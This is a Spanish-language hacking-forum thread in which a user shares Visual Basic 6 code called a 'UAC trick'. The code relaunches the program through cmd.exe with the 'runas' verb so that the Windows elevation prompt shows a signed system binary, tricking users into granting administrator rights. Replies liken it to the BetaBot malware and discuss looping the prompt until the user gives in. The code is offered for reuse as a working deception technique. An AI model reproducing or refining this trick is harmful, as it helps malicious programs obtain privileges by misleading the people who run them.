Página 1 de 1
VB6 Uac Trick
Publicado: 07 Sep 2015, 12:40
por __ws
Hola!
Dejo esta funcion para elevar la UAC utilizando ingeniería social
Si no se le dan los permisos, continua su ejecución normal.
Saqué la idea del
UACtrick de Scorpio
Declaraciones:
[spoiler][code2=vbnet]Private Declare Function ShellExecute Lib "Shell32" Alias "ShellExecuteA" (ByVal hWnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long
Private Declare Function IsUserAnAdmin Lib "Shell32" Alias "#680" () As Integer[/code2][/spoiler]
Codigo:
[spoiler][code2=vbnet]If IsUserAnAdmin = 0 Then
If ShellExecute(0, "runas", "cmd.exe", " /c """ & App.path & "\" & App.EXEName & ".exe" & """", App.path & "\", vbNormalFocus) <> 5 Then
End
End If
End If
'.........
'Ejecucion de codigo normal....
'.........[/code2][/spoiler]
Probado en Win 7 x86 y Win 8.1 x64
Saludos!
Re: VB6 Uac Trick
Publicado: 27 Sep 2015, 13:19
por Pink
Seria mas bien como forzar la UAC porque de ingeniería social no se le ve nada :S
Gracias por el codigo.
Saludos
Re: VB6 Uac Trick
Publicado: 27 Sep 2015, 13:26
por __ws
Pink escribió:Seria mas bien como forzar la UAC porque de ingeniería social no se le ve nada :S
Gracias por el codigo.
Saludos
Cuando le dan doble clic al programa...
En lugar de aparecer asi:
Aparece asi:
Capisce ?
Re: VB6 Uac Trick
Publicado: 27 Sep 2015, 13:31
por comand
Me parece una buena idea, sirve para confundir un poco y con buena conversación creo que pasa desapercibido a menos intendidos
Re: VB6 Uac Trick
Publicado: 27 Sep 2015, 15:41
por Scorpio
Claro que usa Ingenieria Social, trata de engañar al usuario al mostrar una aplicación de windows, es el mismo metodo que usaba la BetaBot, ahora creo que ya tiene Bypass UAC.
//Regards.
Re: VB6 Uac Trick
Publicado: 27 Sep 2015, 20:12
por Pink
aaaaaaa ya veo :)
Saludos
Re: VB6 Uac Trick
Publicado: 27 Sep 2015, 20:16
por Pink
aaaaaaa ya veo :)
Saludos
Re: VB6 Uac Trick
Publicado: 28 Sep 2015, 11:21
por Enzyme
1. Poor mod of MetalKindom method. (Next time give credits. )
2. What kind of trick it is? Where is the fucking loop ? LoL
3.Why da fuck you are passing "vbNormalFocus" as "nShowCmd" ? It also shows cmd window.
4.Nothings resembles with betabot SE.
Re: VB6 Uac Trick
Publicado: 28 Sep 2015, 19:09
por Scorpio
Enzyme escribió:1. Poor mod of MetalKindom method. (Next time give credits. )
2. What kind of trick it is? Where is the fucking loop ? LoL
3.Why da fuck you are passing "vbNormalFocus" as "nShowCmd" ? It also shows cmd window.
4.Nothings resembles with betabot SE.
¿Metal Kingdom? This is my method.
This method try to open the uac dialog with a signed windows application.
Before, BetaBot he used this method.
[Enlace externo eliminado para invitados]
//Regards.
Re: VB6 Uac Trick
Publicado: 01 Oct 2015, 20:03
por Enzyme
¿Metal Kingdom? This is my method.
This method try to open the uac dialog with a signed windows application.
Before, BetaBot he used this method. [Enlace externo eliminado para invitados]
//Regards.
LoL By "Metal Kingdom Method " I meant his UAC popup freeze aka -----------------> Loop Until Error <> 5
The crucial part in betabot UAC SE was that beautiful msgbox Where is that ? +few more things are missing too....
Re: VB6 Uac Trick
Publicado: 06 Oct 2015, 00:52
por __ws
Enzyme escribió:
¿Metal Kingdom? This is my method.
This method try to open the uac dialog with a signed windows application.
Before, BetaBot he used this method. [Enlace externo eliminado para invitados]
//Regards.
LoL By "Metal Kingdom Method " I meant his UAC popup freeze aka -----------------> Loop Until Error <> 5
The crucial part in betabot UAC SE was that beautiful msgbox Where is that ? +few more things are missing too....
Eso de' error <> 5', lo descubrí yo, es tan simple como mostrar la UAC, cancelarla y revisar el codigo de error que retorna, no habia visto el de Metal.
Re: VB6 Uac Trick
Publicado: 06 Oct 2015, 01:21
por adwind